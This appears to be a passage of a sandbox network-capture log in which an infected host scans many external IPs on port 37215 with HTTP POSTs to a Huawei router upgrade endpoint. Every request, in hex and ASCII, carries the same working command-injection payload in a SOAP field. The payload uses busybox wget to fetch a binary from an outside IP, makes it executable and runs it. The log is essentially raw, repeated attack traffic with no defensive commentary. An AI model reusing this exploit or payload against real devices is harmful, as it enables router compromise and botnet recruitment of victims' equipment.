                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            873192.168.2.155635241.228.30.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742422104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            874192.168.2.155890841.91.43.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742445946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            875192.168.2.155853841.39.56.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742465973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            876192.168.2.153981241.160.193.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742513895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            877192.168.2.156041241.138.117.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742542028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            878192.168.2.154853641.39.158.24237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742572069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            879192.168.2.155260841.92.1.6937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742599010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            880192.168.2.156023241.169.86.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742599964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            881192.168.2.154566041.62.207.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742610931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            882192.168.2.155692441.249.250.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742670059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 